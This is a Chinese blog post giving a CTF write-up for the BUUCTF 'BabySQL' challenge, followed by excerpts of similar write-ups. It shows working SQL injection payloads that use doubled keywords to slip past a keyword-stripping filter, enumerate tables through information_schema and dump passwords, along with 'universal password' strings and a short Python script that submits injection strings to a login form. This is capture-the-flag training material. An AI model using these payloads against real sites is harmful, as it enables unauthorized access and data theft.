buuctf-web-[极客大挑战 2019]BabySQL-wp

最新推荐文章于 2024-09-28 14:42:59 发布
原创 最新推荐文章于 2024-09-28 14:42:59 发布 · 324 阅读 · 0 ·
CC 4.0 BY-SA版权
><本博客上原创文章未经本人许可,不得用于商业用途。转载请注明出处,否则保留追究法律责任的权利。><

本文详细讲述了在 BabySQL 的挑战中,作者通过双写绕过和联合查询注入尝试,成功登录并利用SQL注入获取敏感信息的过程,揭示了在Web应用安全中的实践策略。

[极客大挑战 2019]BabySQL

知识点

  • 双写绕过

过程

主页是一个登录框

随便输入两个参数,发现是传入的是get型参数

首先注入肯定存在,先尝试联合查询注入:

check.php?username=admin%27+union+select+1%2C2%2C3%23&password=admin

失败,双写union 和 select可绕过

check.php?username=admin%27+ununionion+seselectlect+1%2C2%2C3%23&password=admin

登陆成功,将参数admin置为假,可以看到页面有显示位置:

check.php?username=-admin%27+ununionion+seselectlect+1%2C2%2C3%23&password=admin

然后尝试注入

/check.php?username=1' ununionion selselectect 1,(selselectect group_concat(table_name) frofromm infoorrmation_schema.tables whwhereere table_schema=database()),3 %23&password=1111


check.php?username=1' ununionion selselectect 1,(seselectlect group_concat(passwoorrd) frfromom b4bsql),3 %23&password=1111

buuctf web [极客挑战 2019]BabySQL
m0_46412682的博客
07-16 1139
buuctf web [极客挑战 2019]BabySQL 开始的页面 随便输入用户名和密码 sql注入,先判断有多少字段 从图中可以看到select和union被过滤了,可以用双写selselectect uniunionon还有的是’单引号和#要编码变成%27 %23,先猜测4个字段,错误 3个字段,成功 ?username=admin&password=123%27ununionion selselectect 1,2,3%20%23 爆库 ?username=admin&
buuctf-[极客挑战 2019]BabySQL(小宇特详解)
小宇的web博客
01-19 5530
buuctf-[极客挑战 2019]BabySQL(小宇特详解) 这里看题的话是一道SQL注入。 这里先尝试一下万能密码 这里发现它过滤了or(直接删除了or) 这里尝试进行双写 也就是oorr,这里删除了or后又重新构造了一个or 这里发现还是不行 这里先看一下双写union select 1 /check.php?username=admin&password=1 %27 ununionion seselectlect 1 %23 这里发现不是报错,而是列数不对 当列数为3的时候对
BUUCTF之[极客挑战 2019]BabySQL 解决方法
weixin_44632787的博客
06-17 2181
BUUCTF之[极客挑战 2019]BabySQL 解决方法 启动我们的挑战项目 emmmmm这是第三个SQL注入,应该难度又提高了一些。先试试我们的万能密码:1’ or 1=1 # 不行,报错了。而且我也看不出报错的信息是什么 然后返回前面的题目看看提示信息,觉得可能这题是加了一些过滤信息 所以我们试试双写看看能不能绕过防御,并且把最后面的 # 号改成 %23。 所以我们的payload为:1’ oorr 1=1 %23 发现可以获取到信息,说明我们这个方法是正确的! 然后我们再进行用ord
BUUCTF WEB [极客挑战 2019]BabySQL
Y1da的博客
04-16 247
BUUCTF WEB [极客挑战 2019]BabySQL 进入环境后尝试万能密码登录失败,尝试常规sql注入 check.php?username=1&password=2' union select 1,2,3;# 回显 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use n
[极客挑战 2019]BabySQL wp
{OvEr}的博客
11-18 275
[极客挑战 2019]BabySQL wp 主要考点就是sql注入,以及replace()函数过滤,解决方法双写绕过 打开页面,试试万能密码,发现密码不对,可以判断是sql注入,方式是get请求。 接下来就是查列数,试试注入 ?username=admin&password=123 %27 order by 1 %23 发现回显只显示出了der 1,说明or 和 by 都被过滤了,那我们就试一试双写能否绕过 发现没有报错,那么双写就可以绕过过滤,继续查列数,当查到4 的时候报错,列数为3.
Buuctf-Web-[极客挑战 2019]EasySQL 1 题解及思路总结
热门推荐
m0_62239233的博客
09-16 2万+
SQL注入。
Buuctf-Web-[极客挑战 2019]EasySQL 1 题解笔记
2402_87039650的博客
09-28 506
如果为双闭合,输入1'语句是正确的,不会报错,但实际报错了,假设不成立,输入1''正确的语句不可以出现一对双引号包含双引号的,所以应该报错,但实际没有报错,所以假设不成立。当字符串内需要包含双引号时,除了使用转义字符外,也可以使用一对单引号来包括字符串,字符串内的双引号被视为普通字符,无需特殊处理。有单引号闭合和双引号闭合,先判断SQL闭合方式,再选择相应的弱口令,(弱口令见上一篇博客)如果为单闭合,输入1'会报错,语句不正确,输入1''不报错,实际与此完全相同,假设成立。以上图片均来自此博主。
BUUCTF---[极客挑战 2019]BabySQL1
2201_75556700的博客
03-03 1079
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#使用该语句查表名时发现union,select,from,where都被过滤了。8.这里没有得到flag可能是我遗漏了什么,查了资料才发现,flag可能不在我们当前这个数据库里面,想到一开始,我还没查询库名,不知道它有几个苦命,于是使用下面命令进行数据库库名查询。使用下面命令爆第一张表的字段。
Buuctf-Web-[极客挑战 2019]Havefun
御七彩虹猫
05-13 439
Buuctf-Web-[极客挑战 2019]Havefun
[极客挑战 2019]BabySQL WP
qq_43039823的博客
07-30 318
[极客挑战 2019]BabySQL 1 实话说起来这个题目其实挺套娃的 打开一个又是一个登录界面,好啊,先试试万能密码?username=admin’ or 1=1#&password=123 意料之中的报错。查看一下自己的url发现呢, 概是对我们所输入的内容,进行了相应的检查,check.php ,然后我们在URL中 输入的东西,在下端没有回显,由此可确定我们输入的sql语句中的一些关键词,被过滤。 而且我们跳转到了 check.php 界面 ,由此我们才测试哪
Buuctf-[极客挑战 2019]BabySQL
m0_63563528的博客
04-12 1833
这题的难点在于不知道过滤内容有哪些,我是通过双写一个一个的试出来的:ununionion ,seselectlect,frfromom,infoorrmation,passwoorrd,whwhereere这些要双写。如此便成功找到flag。
BUUCTF:[极客挑战 2019]BabySQL
末初 · mochu7
11-04 922
题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]BabySQL 简单测试之后发现有些字符被过滤,初步判断这里的过滤是指特殊字符被替换为空,如下图所示 使用Burp进行SQL过滤字符的Fuzz 这些长度为726响应内容是Input your username and password的Fuzz结果是被过滤的字符 Trick 替换为空的关键字过滤使用双写关键字绕过 这里空格.
BUUCTF[极客挑战 2019]BabySQL
网络空间安全学习
06-25 2474
通过输入非0数字,能正常回显,0和字母不能正常回显,什么都没有显示。刚刚我们输入非0数字正常回显,0和字母不能正常的回显,猜测说明sql语句当中可能存在||运算符,只有输入非0数字,才会返回true,回显条件。可观察网页的源码信息,发现有check.php,猜测可能是登录界面时,输入账号和密码的跳转界面,提示信息。通过上面的过程我们不难发现,此时还存在过滤,from和where也被过滤,同理双写绕过。拿到该靶机,观察界面,存在登录说明存在可能SQL注入,根据题目也可得知存在SQL注入。
BUUCTF [极客挑战 2019] BabySQL
Senimo
03-25 4604
BUUCTF [极客挑战 2019] BabySQL 启动靶机,打开环境: 尝试登陆: 因为前两次的题目BUUCTF 极客挑战 2019 EasySQL和均用万能密码登陆成功,再次尝试: /check.php ?username=admin' or '1'='1 &password=1 登陆失败,尝试注释掉password内容: /check.php ?username=adm...
BUUCTF[极客挑战2019]BabySQL
weixin_45253622的博客
05-07 400
SQL注入题型 输入 admin' 123 报错;发现存在注入点和闭合方式。 我们查看字段; ?username=admin&password=123' order by 3 从报错提示可以看出,过滤掉了or字段,所以万能密码不能使用,我们试试嵌套绕过;?username=admin&password=123' oorrder by 3 ...
BUUCTF-Web】[极客挑战 2019]BabySQL
weixin_49298681的博客
01-05 394
1.根据提示知道sql注入有严格的过滤;再通过尝试找到绕过的方法为藏字符2.直接获得username和password 但是没有有用的信息3.通过order by的报错知晓有多少列:root =4.寻找回显点:root =>5.获得数据库基本信息:root =>6.通过information_schema数据库爆破table_name + column_names1.root =2.root =7.再根据知道的column_names去获取数据1.root =
BUUCTFBabySQL[极客挑战 2019]
金 帛的博客
06-11 597
BUUCTF记录贴
buuctf-web极客挑战2019
qq_47804678的博客
02-08 438
于是用bp使用post方式,注意将user=0改成user=1(意思也就是:是cuit的学生为真。一开始我还改成了“cuit's students”。一共就两个页面,就都看一下,发现还有提示:必须是cuit的学生,还得写对密码。如果不加密直接返回的话,flag.php被解析后是看不到有flag的源文件的,所以只能加密然后用在线工具再进行解密得到源文件。bp抓包发现中间302跳转时给了另一个路径secr3t.php,尝试访问,F12找到隐藏的路径.Archive_romm.php,尝试访问,
BUUCTF】 [极客挑战2019] BabySQL —— 清晰易懂总结好的 Writeup
algae
08-25 1093
BUUCTF】 [极客挑战2019] BabySQL Writeup0x00 考点sql 注入 双写绕过0x01 解题爆库爆表爆列 0x00 考点 sql 注入 双写绕过 replace函数,找到union和select等替换为空 双写绕过,单词中间拆开,分两半,里面藏一个完整的: union ununionion select seselectlect from frfromom where whwhereere (过滤了or) information infoorrmation 常见UR
Buuctf-Web-[极客挑战 2019]EasySQL1 代码
最新发布
12-28
### Buuctf Web 极客挑战 2019 EasySQL1 解题代码 对于Buuctf Web中的极客挑战2019之EasySQL1,由于该题目存在未对输入参数进行适当过滤的情况,可以利用这一特性通过SQL注入的方式完成解题。下面展示的是基于此逻辑构建的攻击向量实现方式。 #### 使用Python脚本模拟请求并获取Flag ```python import requests url = "http://example.com/login" # 替换成实际地址 payload = { 'username': "' OR '1'='1", 'password': "' OR '1'='1" } response = requests.post(url, data=payload) if "flag{" in response.text: start_index = response.text.find("flag{") end_index = response.text.find('}', start_index) + 1 flag = response.text[start_index:end_index] print(f"The obtained flag is: {flag}") else: print("Failed to obtain the flag.") ``` 上述代码展示了如何构造一个简单的POST请求来发送含有SQL注入语句的数据包给目标网站,并从中提取返回页面内的`flag`字符串[^1]。 需要注意的是,在真实环境中应当合法合规地参与CTF竞赛活动,不得用于非法目的或损害他人利益的行为上。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值